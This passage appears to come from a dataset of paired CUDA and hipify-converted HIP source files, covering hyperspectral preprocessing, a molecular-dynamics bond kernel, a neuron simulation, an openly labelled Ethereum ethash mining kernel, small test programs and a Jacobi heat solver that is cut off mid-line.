device SAFE_CALL(cudaMalloc((void **) &gpu_data, sizeof(double) * x * y * z)); SAFE_CALL(cudaMemcpy(gpu_data, data, sizeof(double)* x * y * z, cudaMemcpyHostToDevice)); SAFE_CALL(cudaMalloc((void **) &gpu_train_index, sizeof(int) * train_size * (NEIGHBOR+1))); SAFE_CALL(cudaMemcpy(gpu_train_index, train_index, sizeof(int) * train_size * (NEIGHBOR+1), cudaMemcpyHostToDevice)); SAFE_CALL(cudaMalloc((void **) &gpu_test_index, sizeof(int) * test_size * (NEIGHBOR+1))); SAFE_CALL(cudaMemcpy(gpu_test_index, test_index, sizeof(int) * test_size * (NEIGHBOR+1), cudaMemcpyHostToDevice)); SAFE_CALL(cudaMalloc((void **) &gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z));//size of one batch of data SAFE_CALL(cudaMalloc((void **) &gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z)); int gridsize = 64; int blocksize = 1024; int threadnum = gridsize * blocksize; double * processed_train = new double [train_size * (NEIGHBOR+1) * z];\ double * processed_test = new double [test_size * (NEIGHBOR+1) *z]; //preprocessing for (int iter=0; iter<=train_size/threadnum; iter++){ processing<<<gridsize,blocksize>>>(iter, gpu_data, gpu_train_index, gpu_processed_train, x, y, z, train_size); processing<<<gridsize,blocksize>>>(iter, gpu_data, gpu_test_index, gpu_processed_test, x, y, z, test_size); } cudaDeviceSynchronize(); SAFE_CALL(cudaMemcpy(processed_train, gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z, cudaMemcpyDeviceToHost)); SAFE_CALL(cudaMemcpy(processed_test, gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z, cudaMemcpyDeviceToHost)); //cudaDeviceSynchronize(); fprintf(stdout,"Processed train data:%lf %lf %lf %lf\n",processed_train[0],processed_train[1],processed_train[2],processed_train[3]); fprintf(stdout,"Processed test data:%lf %lf %lf %lf\n",processed_test[0],processed_test[1],processed_test[2],processed_test[3]); MATFile * pmatFile; pmatFile = matOpen("testdata.mat","w"); mxArray * m1 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,test_size,mxREAL); memcpy((void *)mxGetPr(m1), (void *)processed_test, sizeof(double) * (NEIGHBOR+1) * z * test_size); matPutVariable(pmatFile, "data", m1);
mxArray * m2 = mxCreateDoubleMatrix(test_size,1,mxREAL); memcpy((void *)mxGetPr(m2), (void *)test_labels, sizeof(double) * test_size); matPutVariable(pmatFile, "labels", m2); matClose(pmatFile); MATFile * pmatFile0; pmatFile0 = matOpen("traindata.mat","w"); mxArray * m3 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,train_size,mxREAL); memcpy((void *)mxGetPr(m3), (void *)processed_train, sizeof(double) * (NEIGHBOR+1) * z * train_size); matPutVariable(pmatFile0, "data", m3); mxArray * m4 = mxCreateDoubleMatrix(NEU_NUM2,train_size,mxREAL); memcpy((void *)mxGetPr(m4), (void *)processed_labels, sizeof(double) * train_size * NEU_NUM2); matPutVariable(pmatFile0, "labels", m4); matClose(pmatFile0); return 0; } //main function int main(int argc, char * argv[]) { if(!InitCUDA()){ return 0; } printf("CUDA initialized.\n"); clock_t start,end; double *trainset,*trainlabels; if(argc!=2){ fprintf(stderr, "1 input argument required!"); return 1; } MATFile * datamat = matOpen(argv[1], "r"); mxArray * train = matGetVariable(datamat,"DataSet"); mxArray * labels = matGetVariable(datamat,"labels"); trainset = (double*)mxGetData(train); trainlabels = (double*)mxGetData(labels); fprintf(stdout,"Data reading completed!\n"); fprintf(stdout,"trainlabels:%lf %lf %lf %lf\n",trainlabels[87],trainlabels[88],trainlabels[89],trainlabels[90]); const mwSize * dim; dim = mxGetDimensions(train);//get the number of elements in each dimension of trainset fprintf(stdout,"Dimension:%d %d %d\n",dim[0],dim[1],dim[2]); start = clock(); int te = preprocess(trainset, trainlabels, dim[0], dim[1], dim[2]); end = clock(); double usetime = double(end - start); fprintf(stdout, "Using time of preprocessing:%lfs\n",usetime/CLOCKS_PER_SEC); return 0; }
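For reference, the 9-entry neighbourhood layout that preprocess() above builds for each labeled pixel can be written as a small helper. This is an illustration (not part of the original file); it assumes an interior pixel, with the border replication handled as in the code above.

// Illustrative helper: the 3x3 neighbourhood indices preprocess() stores for
// one interior pixel, assuming x entries per column so that +/-1 moves within
// a column and +/-x moves between columns (as in the code above).
void neighbourhood_indices(int center, int x, int out[9]) {
    for (int j0 = 0; j0 < 3; j0++) {
        out[j0]     = center - 1 - x + j0;  // previous column
        out[j0 + 3] = center - 1     + j0;  // own column (out[4] == center)
        out[j0 + 6] = center - 1 + x + j0;  // next column
    }
}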
a5c45efce0b34a7608fda4d0c1fa9b910ad419b7.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /** * Copyright 2021 Huawei Technologies Co., Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "backend/kernel_compiler/gpu/cuda_impl/sponge/bond/bond_force_with_atom_energy_impl.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/sponge/common_sponge.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/util.cuh" __global__ void BondForceWithAtomEnergyKernel(int bond_numbers, const UNSIGNED_INT_VECTOR *uint_crd, const VECTOR *scaler, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, VECTOR *frc, float *atom_energy) { int bond_i = blockDim.x * blockIdx.x + threadIdx.x; if (bond_i < bond_numbers) { int atom_i = atom_a[bond_i]; int atom_j = atom_b[bond_i]; float k = bond_k[bond_i]; float r0 = bond_r0[bond_i]; VECTOR dr = Get_Periodic_Displacement(uint_crd[atom_i], uint_crd[atom_j], scaler[0]); float abs_r = norm3df(dr.x, dr.y, dr.z); float r_1 = 1. / abs_r; float tempf = abs_r - r0; VECTOR f = 2 * tempf * r_1 * k * dr; atomicAdd(&frc[atom_i].x, -f.x); atomicAdd(&frc[atom_i].y, -f.y); atomicAdd(&frc[atom_i].z, -f.z); atomicAdd(&frc[atom_j].x, f.x); atomicAdd(&frc[atom_j].y, f.y); atomicAdd(&frc[atom_j].z, f.z); atomicAdd(&atom_energy[atom_i], k * tempf * tempf); } } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, hipStream_t stream) { size_t thread_per_block = 128; size_t block_per_grid = ceilf(static_cast<float>(bond_numbers) / 128); UNSIGNED_INT_VECTOR *uint_crd = const_cast<UNSIGNED_INT_VECTOR *>(reinterpret_cast<const UNSIGNED_INT_VECTOR *>(uint_crd_f)); VECTOR *frc = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(frc_f)); VECTOR *scaler = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(scaler_f)); hipLaunchKernelGGL(( BondForceWithAtomEnergyKernel), dim3(block_per_grid), dim3(thread_per_block), 0, stream, bond_numbers, uint_crd, scaler, atom_a, atom_b, bond_k, bond_r0, frc, atom_e); return; } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, hipStream_t stream);
a5c45efce0b34a7608fda4d0c1fa9b910ad419b7.cu
/** * Copyright 2021 Huawei Technologies Co., Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "backend/kernel_compiler/gpu/cuda_impl/sponge/bond/bond_force_with_atom_energy_impl.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/sponge/common_sponge.cuh" #include "backend/kernel_compiler/gpu/cuda_impl/util.cuh" __global__ void BondForceWithAtomEnergyKernel(int bond_numbers, const UNSIGNED_INT_VECTOR *uint_crd, const VECTOR *scaler, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, VECTOR *frc, float *atom_energy) { int bond_i = blockDim.x * blockIdx.x + threadIdx.x; if (bond_i < bond_numbers) { int atom_i = atom_a[bond_i]; int atom_j = atom_b[bond_i]; float k = bond_k[bond_i]; float r0 = bond_r0[bond_i]; VECTOR dr = Get_Periodic_Displacement(uint_crd[atom_i], uint_crd[atom_j], scaler[0]); float abs_r = norm3df(dr.x, dr.y, dr.z); float r_1 = 1. / abs_r; float tempf = abs_r - r0; VECTOR f = 2 * tempf * r_1 * k * dr; atomicAdd(&frc[atom_i].x, -f.x); atomicAdd(&frc[atom_i].y, -f.y); atomicAdd(&frc[atom_i].z, -f.z); atomicAdd(&frc[atom_j].x, f.x); atomicAdd(&frc[atom_j].y, f.y); atomicAdd(&frc[atom_j].z, f.z); atomicAdd(&atom_energy[atom_i], k * tempf * tempf); } } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, cudaStream_t stream) { size_t thread_per_block = 128; size_t block_per_grid = ceilf(static_cast<float>(bond_numbers) / 128); UNSIGNED_INT_VECTOR *uint_crd = const_cast<UNSIGNED_INT_VECTOR *>(reinterpret_cast<const UNSIGNED_INT_VECTOR *>(uint_crd_f)); VECTOR *frc = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(frc_f)); VECTOR *scaler = const_cast<VECTOR *>(reinterpret_cast<const VECTOR *>(scaler_f)); BondForceWithAtomEnergyKernel<<<block_per_grid, thread_per_block, 0, stream>>>(bond_numbers, uint_crd, scaler, atom_a, atom_b, bond_k, bond_r0, frc, atom_e); return; } void BondForceWithAtomEnergy(int bond_numbers, const int *uint_crd_f, const float *scaler_f, const int *atom_a, const int *atom_b, const float *bond_k, const float *bond_r0, float *frc_f, float *atom_e, cudaStream_t stream);
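As a reading aid (not part of the original sources), the force accumulated by BondForceWithAtomEnergyKernel above corresponds to a harmonic bond potential between atoms i and j:

\[
E_{ij} = k\left(\lVert\mathbf{r}_{ij}\rVert - r_0\right)^2,
\qquad \mathbf{r}_{ij} = \mathbf{r}_i - \mathbf{r}_j
\]
\[
\mathbf{F}_i = -\nabla_{\mathbf{r}_i} E_{ij}
            = -2k\left(\lVert\mathbf{r}_{ij}\rVert - r_0\right)\frac{\mathbf{r}_{ij}}{\lVert\mathbf{r}_{ij}\rVert},
\qquad \mathbf{F}_j = -\mathbf{F}_i
\]

This matches the kernel: f = 2k(|r_ij| - r_0) r_ij / |r_ij| is subtracted from frc[atom_i], added to frc[atom_j], and the energy k(|r_ij| - r_0)^2 is accumulated onto atom_energy[atom_i].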
a50626310b3c16f64b3db69ec7611d5cd628427d.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "iteration.cuh" /* Increment the time-step by 1. * For use only with a single block and a single thread */ __global__ void time_step(int *dev_time) { *dev_time += 1; } /* For all neurons with potential > IzTHRESHOLD, add their indices to * the fired array. Also reset the neurons which are firing. */ __global__ void find_firing_neurons(Neuron *neurons, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; float v, u; if (offset >= number) { // There are no such neurons return; } v = neurons[offset].potential; u = neurons[offset].recovery; if (v > IzTHRESHOLD) { fired[offset] = true; // reset firing neuruons neurons[offset].potential = IzC; neurons[offset].recovery = u + IzD; } } /* For all fired neurons, update the thalamic input on connected * neurons.*/ __global__ void update_current(Neuron *neurons, Connection *connections, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; int cIdx, nIdx; // First, make the current on all neurons 0 + the input value for // that neuron if (offset < number) { neurons[offset].current = 0 + 1000*neurons[offset].input; } // Ensure that *all* neurons have 0 current __syncthreads(); if (fired == NULL || fired[offset] == false) { // No such fired neuron return; } cIdx = neurons[offset].connection; if (connections != NULL) { do { nIdx = connections[cIdx].neuron; atomicAdd(&(neurons[nIdx].current), 1000*connections[cIdx].weight); // atomicAdd(&neurons[connections[cIdx].neuron].current, // 1.0f); cIdx = connections[cIdx].next; } while (cIdx >= 0); } }
a50626310b3c16f64b3db69ec7611d5cd628427d.cu
#include "iteration.cuh" /* Increment the time-step by 1. * For use only with a single block and a single thread */ __global__ void time_step(int *dev_time) { *dev_time += 1; } /* For all neurons with potential > IzTHRESHOLD, add their indices to * the fired array. Also reset the neurons which are firing. */ __global__ void find_firing_neurons(Neuron *neurons, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; float v, u; if (offset >= number) { // There are no such neurons return; } v = neurons[offset].potential; u = neurons[offset].recovery; if (v > IzTHRESHOLD) { fired[offset] = true; // reset firing neuruons neurons[offset].potential = IzC; neurons[offset].recovery = u + IzD; } } /* For all fired neurons, update the thalamic input on connected * neurons.*/ __global__ void update_current(Neuron *neurons, Connection *connections, bool *fired, int number) { int offset = blockIdx.x * blockDim.x * blockDim.y + threadIdx.x; int cIdx, nIdx; // First, make the current on all neurons 0 + the input value for // that neuron if (offset < number) { neurons[offset].current = 0 + 1000*neurons[offset].input; } // Ensure that *all* neurons have 0 current __syncthreads(); if (fired == NULL || fired[offset] == false) { // No such fired neuron return; } cIdx = neurons[offset].connection; if (connections != NULL) { do { nIdx = connections[cIdx].neuron; atomicAdd(&(neurons[nIdx].current), 1000*connections[cIdx].weight); // atomicAdd(&neurons[connections[cIdx].neuron].current, // 1.0f); cIdx = connections[cIdx].next; } while (cIdx >= 0); } }
5186caaf0da0c501969ce9e64b22dc208bed7178.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <stdlib.h> __global__ void testKernel(int param){ printf("%d, %d\n", threadIdx.x, param); } int main(void){ // initialize cuPrintf int N = 3; int a = 456; dim3 threadsPerBlock(N, N); printf("init\n"); hipLaunchKernelGGL(( testKernel), dim3(1),dim3(threadsPerBlock), 0, 0, a); return 0; }
5186caaf0da0c501969ce9e64b22dc208bed7178.cu
#include <stdio.h> #include <stdlib.h> __global__ void testKernel(int param){ printf("%d, %d\n", threadIdx.x, param); } int main(void){ int N = 3; int a = 456; dim3 threadsPerBlock(N, N); printf("init\n"); testKernel<<<1,threadsPerBlock>>>(a); /* wait for the kernel so the device-side printf output is flushed before exit */ cudaDeviceSynchronize(); return 0; }
201c007c85ed3f4bb13b67a66197e7058dfac145.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * Genoil's CUDA mining kernel for Ethereum * based on Tim Hughes' opencl kernel. * thanks to sp_, trpuvot, djm34, cbuchner for things i took from ccminer. */ #include "ethash_cuda_miner_kernel.h" #include "ethash_cuda_miner_kernel_globals.h" #include "cuda_helper.h" #include "fnv.cuh" #define copy(dst, src, count) for (int i = 0; i != count; ++i) { (dst)[i] = (src)[i]; } #include "keccak.cuh" #include "dagger_shuffled.cuh" template <uint32_t _PARALLEL_HASH> __global__ void ethash_search( volatile Search_results* g_output, uint64_t start_nonce ) { uint32_t const gid = blockIdx.x * blockDim.x + threadIdx.x; //uint2 mix[4]; if (compute_hash<_PARALLEL_HASH>(start_nonce + gid, d_target/*, mix*/)) return; uint32_t index = atomicInc((uint32_t *)&g_output->count, 0xffffffff); if (index >= MAX_SEARCH_RESULTS) return; g_output->result[index].gid = gid; #if 0 g_output->result[index].mix[0] = mix[0].x; g_output->result[index].mix[1] = mix[0].y; g_output->result[index].mix[2] = mix[1].x; g_output->result[index].mix[3] = mix[1].y; g_output->result[index].mix[4] = mix[2].x; g_output->result[index].mix[5] = mix[2].y; g_output->result[index].mix[6] = mix[3].x; g_output->result[index].mix[7] = mix[3].y; #endif } __host__ void run_ethash_search( uint32_t gridSize, uint32_t blockSize, hipStream_t stream, volatile Search_results* g_output, uint64_t start_nonce, uint32_t parallelHash ) { switch (parallelHash) { case 1:hipLaunchKernelGGL(( ethash_search <1>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; case 2:hipLaunchKernelGGL(( ethash_search <2>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; case 4:hipLaunchKernelGGL(( ethash_search <4>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; case 8:hipLaunchKernelGGL(( ethash_search <8>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; default:hipLaunchKernelGGL(( ethash_search <4>) , dim3(gridSize), dim3(blockSize), 0, stream , g_output, start_nonce); break; } CUDA_SAFE_CALL(hipGetLastError()); } #define ETHASH_DATASET_PARENTS 256 #define NODE_WORDS (64/4) __global__ void ethash_calculate_dag_item(uint32_t start) { uint32_t const node_index = start + blockIdx.x * blockDim.x + threadIdx.x; if (((node_index/4)*4) >= d_dag_size * 2) return; hash200_t dag_node; copy(dag_node.uint4s, d_light[node_index % d_light_size].uint4s, 4); dag_node.words[0] ^= node_index; SHA3_512(dag_node.uint2s); const int thread_id = threadIdx.x & 3; for (uint32_t i = 0; i != ETHASH_DATASET_PARENTS; ++i) { uint32_t parent_index = fnv(node_index ^ i, dag_node.words[i % NODE_WORDS]) % d_light_size; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,parent_index, t, 4); uint4 p4 = d_light[shuffle_index].uint4s[thread_id]; for (int w = 0; w < 4; w++) { uint4 s4 = make_uint4(__shfl_sync(0xFFFFFFFF,p4.x, w, 4), __shfl_sync(0xFFFFFFFF,p4.y, w, 4), __shfl_sync(0xFFFFFFFF,p4.z, w, 4), __shfl_sync(0xFFFFFFFF,p4.w, w, 4)); if (t == thread_id) { dag_node.uint4s[w] = fnv4(dag_node.uint4s[w], s4); } } } } SHA3_512(dag_node.uint2s); hash64_t * dag_nodes = (hash64_t *)d_dag; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,node_index, t, 4); uint4 s[4]; for (uint32_t w = 0; w < 4; w++) { s[w] = make_uint4(__shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].x, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].y, t, 4), 
__shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].z, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].w, t, 4)); } if (shuffle_index < d_dag_size * 2) { dag_nodes[shuffle_index].uint4s[thread_id] = s[thread_id]; } } } #if 0 __host__ void ethash_generate_dag( uint64_t dag_size, uint32_t gridSize, uint32_t blockSize, hipStream_t stream ) { const uint32_t work = (uint32_t)(dag_size / sizeof(hash64_t)); const uint32_t run = gridSize * blockSize; uint32_t base; for (base = 0; base <= work - run; base += run) { hipLaunchKernelGGL(( ethash_calculate_dag_item) , dim3(gridSize), dim3(blockSize), 0, stream, base); CUDA_SAFE_CALL(hipDeviceSynchronize()); } if (base < work) { uint32_t lastGrid = work - base; lastGrid = (lastGrid + blockSize - 1) / blockSize; hipLaunchKernelGGL(( ethash_calculate_dag_item) , dim3(lastGrid), dim3(blockSize), 0, stream, base); CUDA_SAFE_CALL(hipDeviceSynchronize()); } CUDA_SAFE_CALL(hipGetLastError()); } #endif __host__ void ethash_generate_dag_part( uint64_t start, uint32_t gridSize, uint32_t blockSize, hipStream_t stream ) { hipLaunchKernelGGL(( ethash_calculate_dag_item) , dim3(gridSize), dim3(blockSize), 0, stream, start); CUDA_SAFE_CALL(hipStreamSynchronize(stream)); } __host__ void set_constants( hash128_t* _dag, uint32_t _dag_size, hash64_t * _light, uint32_t _light_size ) { CUDA_SAFE_CALL(hipMemcpyToSymbol(d_dag, &_dag, sizeof(hash128_t *))); CUDA_SAFE_CALL(hipMemcpyToSymbol(d_dag_size, &_dag_size, sizeof(uint32_t))); CUDA_SAFE_CALL(hipMemcpyToSymbol(d_light, &_light, sizeof(hash64_t *))); CUDA_SAFE_CALL(hipMemcpyToSymbol(d_light_size, &_light_size, sizeof(uint32_t))); } __host__ void set_header( hash32_t _header ) { CUDA_SAFE_CALL(hipMemcpyToSymbol(d_header, &_header, sizeof(hash32_t))); } __host__ void set_target( uint64_t _target ) { CUDA_SAFE_CALL(hipMemcpyToSymbol(d_target, &_target, sizeof(uint64_t))); }
201c007c85ed3f4bb13b67a66197e7058dfac145.cu
/* * Genoil's CUDA mining kernel for Ethereum * based on Tim Hughes' opencl kernel. * thanks to sp_, trpuvot, djm34, cbuchner for things i took from ccminer. */ #include "ethash_cuda_miner_kernel.h" #include "ethash_cuda_miner_kernel_globals.h" #include "cuda_helper.h" #include "fnv.cuh" #define copy(dst, src, count) for (int i = 0; i != count; ++i) { (dst)[i] = (src)[i]; } #include "keccak.cuh" #include "dagger_shuffled.cuh" template <uint32_t _PARALLEL_HASH> __global__ void ethash_search( volatile Search_results* g_output, uint64_t start_nonce ) { uint32_t const gid = blockIdx.x * blockDim.x + threadIdx.x; //uint2 mix[4]; if (compute_hash<_PARALLEL_HASH>(start_nonce + gid, d_target/*, mix*/)) return; uint32_t index = atomicInc((uint32_t *)&g_output->count, 0xffffffff); if (index >= MAX_SEARCH_RESULTS) return; g_output->result[index].gid = gid; #if 0 g_output->result[index].mix[0] = mix[0].x; g_output->result[index].mix[1] = mix[0].y; g_output->result[index].mix[2] = mix[1].x; g_output->result[index].mix[3] = mix[1].y; g_output->result[index].mix[4] = mix[2].x; g_output->result[index].mix[5] = mix[2].y; g_output->result[index].mix[6] = mix[3].x; g_output->result[index].mix[7] = mix[3].y; #endif } __host__ void run_ethash_search( uint32_t gridSize, uint32_t blockSize, cudaStream_t stream, volatile Search_results* g_output, uint64_t start_nonce, uint32_t parallelHash ) { switch (parallelHash) { case 1: ethash_search <1> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; case 2: ethash_search <2> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; case 4: ethash_search <4> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; case 8: ethash_search <8> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; default: ethash_search <4> <<<gridSize, blockSize, 0, stream >>>(g_output, start_nonce); break; } CUDA_SAFE_CALL(cudaGetLastError()); } #define ETHASH_DATASET_PARENTS 256 #define NODE_WORDS (64/4) __global__ void ethash_calculate_dag_item(uint32_t start) { uint32_t const node_index = start + blockIdx.x * blockDim.x + threadIdx.x; if (((node_index/4)*4) >= d_dag_size * 2) return; hash200_t dag_node; copy(dag_node.uint4s, d_light[node_index % d_light_size].uint4s, 4); dag_node.words[0] ^= node_index; SHA3_512(dag_node.uint2s); const int thread_id = threadIdx.x & 3; for (uint32_t i = 0; i != ETHASH_DATASET_PARENTS; ++i) { uint32_t parent_index = fnv(node_index ^ i, dag_node.words[i % NODE_WORDS]) % d_light_size; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,parent_index, t, 4); uint4 p4 = d_light[shuffle_index].uint4s[thread_id]; for (int w = 0; w < 4; w++) { uint4 s4 = make_uint4(__shfl_sync(0xFFFFFFFF,p4.x, w, 4), __shfl_sync(0xFFFFFFFF,p4.y, w, 4), __shfl_sync(0xFFFFFFFF,p4.z, w, 4), __shfl_sync(0xFFFFFFFF,p4.w, w, 4)); if (t == thread_id) { dag_node.uint4s[w] = fnv4(dag_node.uint4s[w], s4); } } } } SHA3_512(dag_node.uint2s); hash64_t * dag_nodes = (hash64_t *)d_dag; for (uint32_t t = 0; t < 4; t++) { uint32_t shuffle_index = __shfl_sync(0xFFFFFFFF,node_index, t, 4); uint4 s[4]; for (uint32_t w = 0; w < 4; w++) { s[w] = make_uint4(__shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].x, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].y, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].z, t, 4), __shfl_sync(0xFFFFFFFF,dag_node.uint4s[w].w, t, 4)); } if (shuffle_index < d_dag_size * 2) { dag_nodes[shuffle_index].uint4s[thread_id] = s[thread_id]; } } } #if 0 __host__ void ethash_generate_dag( uint64_t 
dag_size, uint32_t gridSize, uint32_t blockSize, cudaStream_t stream ) { const uint32_t work = (uint32_t)(dag_size / sizeof(hash64_t)); const uint32_t run = gridSize * blockSize; uint32_t base; for (base = 0; base <= work - run; base += run) { ethash_calculate_dag_item <<<gridSize, blockSize, 0, stream>>>(base); CUDA_SAFE_CALL(cudaDeviceSynchronize()); } if (base < work) { uint32_t lastGrid = work - base; lastGrid = (lastGrid + blockSize - 1) / blockSize; ethash_calculate_dag_item <<<lastGrid, blockSize, 0, stream>>>(base); CUDA_SAFE_CALL(cudaDeviceSynchronize()); } CUDA_SAFE_CALL(cudaGetLastError()); } #endif __host__ void ethash_generate_dag_part( uint64_t start, uint32_t gridSize, uint32_t blockSize, cudaStream_t stream ) { ethash_calculate_dag_item <<<gridSize, blockSize, 0, stream>>>(start); CUDA_SAFE_CALL(cudaStreamSynchronize(stream)); } __host__ void set_constants( hash128_t* _dag, uint32_t _dag_size, hash64_t * _light, uint32_t _light_size ) { CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_dag, &_dag, sizeof(hash128_t *))); CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_dag_size, &_dag_size, sizeof(uint32_t))); CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_light, &_light, sizeof(hash64_t *))); CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_light_size, &_light_size, sizeof(uint32_t))); } __host__ void set_header( hash32_t _header ) { CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_header, &_header, sizeof(hash32_t))); } __host__ void set_target( uint64_t _target ) { CUDA_SAFE_CALL(cudaMemcpyToSymbol(d_target, &_target, sizeof(uint64_t))); }
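A hedged sketch (not from the original sources) of how the host entry points above might be wired together for one search batch. The grid, block, and parallel-hash values are arbitrary tuning knobs, and the pinned results buffer relies on unified addressing so the kernel can write to it directly; buffer generation for the DAG and light cache is assumed to happen elsewhere.

// Illustrative host wiring for the entry points above; sizes and launch
// parameters are placeholders.
void start_search(hash128_t *d_dag, uint32_t dag_words,
                  hash64_t *d_light, uint32_t light_words,
                  hash32_t header, uint64_t target, uint64_t start_nonce)
{
    cudaStream_t stream;
    CUDA_SAFE_CALL(cudaStreamCreate(&stream));

    // Pinned host buffer; with unified addressing the kernel writes to it directly.
    volatile Search_results *results;
    CUDA_SAFE_CALL(cudaMallocHost((void **)&results, sizeof(Search_results)));
    results->count = 0;

    // Publish device pointers and search parameters to the kernels.
    set_constants(d_dag, dag_words, d_light, light_words);
    set_header(header);
    set_target(target);

    // One batch of hashes.
    run_ethash_search(8192, 128, stream, results, start_nonce, 4);
    CUDA_SAFE_CALL(cudaStreamSynchronize(stream));

    for (uint32_t i = 0; i < results->count && i < MAX_SEARCH_RESULTS; i++) {
        // start_nonce + results->result[i].gid is a candidate nonce to verify.
    }

    CUDA_SAFE_CALL(cudaFreeHost((void *)results));
    CUDA_SAFE_CALL(cudaStreamDestroy(stream));
}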
c45ade100722a3fbb2e0403ba88bdeefcabe9288.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> __global__ void kernel() {} int main (){ hipLaunchKernelGGL(( kernel), dim3(1),dim3(1), 0, 0, ); printf("Hello, World!\n"); return 0; }
c45ade100722a3fbb2e0403ba88bdeefcabe9288.cu
#include <stdio.h> __global__ void kernel() {} int main (){ kernel<<<1,1>>>(); printf("Hello, World!\n"); return 0; }
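This pair is the smallest possible illustration of the launch-syntax rewrite hipify performs. A slightly larger, purely hypothetical kernel (axpy, not part of either file) makes the mapping of grid, block, shared memory, stream and kernel arguments easier to see:

__global__ void axpy(int n, float a, const float* x, float* y)   // hypothetical example kernel
{
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n) y[i] += a * x[i];
}

void launch_axpy(int n, float a, const float* x, float* y)
{
    dim3 grid((n + 255) / 256), block(256);
    // CUDA source form:      axpy<<<grid, block, 0, 0>>>(n, a, x, y);
    // hipify output form:
    hipLaunchKernelGGL(axpy, grid, block, 0, 0, n, a, x, y);
}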
9520a711c0456826bb8879f6babfd71c24685511.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <stdint.h> #include <string.h> #include <math.h> void Print_matrix(int N, FILE *f, double *m, long int n); __global__ void Jacobi(long int n, double *in, double *out); int main(void) { int N = 128; int block = 1024; int grid = N * N / 1024; double *heat = (double *) calloc(sizeof(double), N * N), *arr, *arr_out; hipMalloc(&arr, sizeof(double) * N * N); hipMalloc(&arr_out, sizeof(double) * N * N); hipMemcpy(arr, heat, sizeof(double) * N * N, hipMemcpyHostToDevice); dim3 Block(block); dim3 Grid(grid); int k_iter = 0; for (int i = 0; i < N; i++) { heat[N * i] = 1; } FILE *f = fopen("heat.txt", "wb"); for(;;) { k_iter++; hipLaunchKernelGGL(( Jacobi), dim3(Grid), dim3(Block), 0, 0, N, arr, arr_out); hipMemcpy(heat, arr, sizeof(double)*N*N, hipMemcpyDeviceToHost); Print_matrix(N, f, heat, N); if (k_iter >= 200) { break; } } hipDeviceSynchronize(); fclose(f); free(heat); hipFree(arr); hipFree(arr_out); } __global__ void Jacobi(long int n, double *in, double *out) { int myId, i, j; int north, south, east, west; //double N, S, E, W; int index_center; //int flag = 0; myId = threadIdx.x + 